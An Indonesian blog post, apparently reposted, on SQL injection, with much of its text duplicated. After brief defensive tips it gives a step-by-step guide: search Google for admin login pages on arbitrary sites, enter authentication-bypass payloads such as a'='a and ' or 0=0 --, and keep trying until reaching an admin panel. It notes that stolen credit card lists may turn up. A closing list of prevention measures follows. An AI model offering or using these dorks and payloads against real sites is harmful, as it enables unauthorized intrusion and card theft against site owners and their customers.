Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga menyebabkan string maupun karakter ‘ diubah menjadi \’ secara otomatis oleh php
Contoh :
Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga menyebabkan string maupun karakter ‘ diubah menjadi \’ secara otomatis oleh php
Contoh :
Contoh script yang membatasi karakter yang bisa masukkan :
function validatepassword( input )
good_password_chars =
“abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ”
validatepassword = true
for i = 1 to len( input )
c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function
Implementasi SQL Injection
1) Masuk ke google atau browse yg lain
2) Masukkan salah satu keyword berikut
“/admin.asp”
“/login.asp”
“/logon.asp”
“/adminlogin.asp”
“/adminlogon.asp”
“/admin_login.asp”
“/admin_logon.asp”
“/admin/admin.asp”
“/admin/login.asp”
“/admin/logon.asp”
{anda bisa menambahi sendiri sesuai keinginan anda}
function validatepassword( input )
good_password_chars =
“abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ”
validatepassword = true
for i = 1 to len( input )
c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function
Implementasi SQL Injection
1) Masuk ke google atau browse yg lain
2) Masukkan salah satu keyword berikut
“/admin.asp”
“/login.asp”
“/logon.asp”
“/adminlogin.asp”
“/adminlogon.asp”
“/admin_login.asp”
“/admin_logon.asp”
“/admin/admin.asp”
“/admin/login.asp”
“/admin/logon.asp”
{anda bisa menambahi sendiri sesuai keinginan anda}
3) Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword).
4) Masukkan kode berikut :
User name :a’=’a
Password :a’=’a (termasuk tanda petiknya)
5) Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about,
dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.
6) Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
7) Banyak variasi kode yang mungkin, antara lain :
User name : admin
Password :a’=’a
atau bisa dimasukkan ke dua–duanya misal :
‘ or 0=0 — ; “ or 0=0 — ; or 0=0 — ; ‘ or 0=0 # ;
“ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x
8) Cobalah sampai berhasil hingga anda bisa masuk ke admin panel
4) Masukkan kode berikut :
User name :a’=’a
Password :a’=’a (termasuk tanda petiknya)
5) Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about,
dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.
6) Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
7) Banyak variasi kode yang mungkin, antara lain :
User name : admin
Password :a’=’a
atau bisa dimasukkan ke dua–duanya misal :
‘ or 0=0 — ; “ or 0=0 — ; or 0=0 — ; ‘ or 0=0 # ;
“ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x
8) Cobalah sampai berhasil hingga anda bisa masuk ke admin panel
Cara pencegahan SQL INJECTION
1) Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
2) Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3) Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4) Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5) Ubah “Startup and run SQL Server” menggunakan low privilege user di SQL Server Security tab.
1) Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
2) Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3) Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4) Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5) Ubah “Startup and run SQL Server” menggunakan low privilege user di SQL Server Security tab.
(Source: singgahpay.blogspot)
Semoga berbagai artikel tersebut bermanfaat, thanks to google and blogspot. 
Salam,
Postingan
